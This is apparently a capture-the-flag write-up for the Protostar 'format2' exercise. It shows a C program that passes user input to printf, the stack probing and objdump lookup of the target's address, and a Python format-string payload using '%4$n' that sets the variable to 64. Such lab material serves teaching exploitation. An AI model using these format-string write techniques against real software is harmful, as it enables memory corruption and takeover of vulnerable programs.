fgets(buffer, sizeof(buffer), stdin); printf(buffer); if(target == 64) { printf("you have modified the target :)\n"); } else { printf("target is %d :(\n", target); } }
intmain(int argc, char **argv) { vuln(); }
This challenge is a slight variation of the previous one On top of writing to a specific address, this time we’ll have to write a specific number : 64
Like the previous challenge, let’s find target’s address and where the string is written on the stack by printf.
1 2 3 4 5 6 7
user@protostar:~$ /opt/protostar/bin/./format2 ABABABAB%x.%x.%X.%X.%X.%X.%X.%X.%X.%X ABABABAB200.�b7fd8420.BFFFF604.42414241.42414241.C32E7825.252E7825.58252E58.2E58252E.252E5825 target is 0 :( user@protostar:~$ objdump -t /opt/protostar/bin/format2 | grep target 080496e4 g O .bss 00000004 target user@protostar:~$
We have to write at 080496e4 at the 4th address. Now how can we write exactly 64 ? Well we can use the same trick from format0 and pad the buffer with the minimum field width.
1 2 3 4 5 6
user@protostar:~$ python -c 'print "\xe4\x96\x04\x08"+"%60d"+"%4$n"' > payload user@protostar:~$ cat payload - | /opt/protostar/bin/./format2 �� 512 you have modified the target :)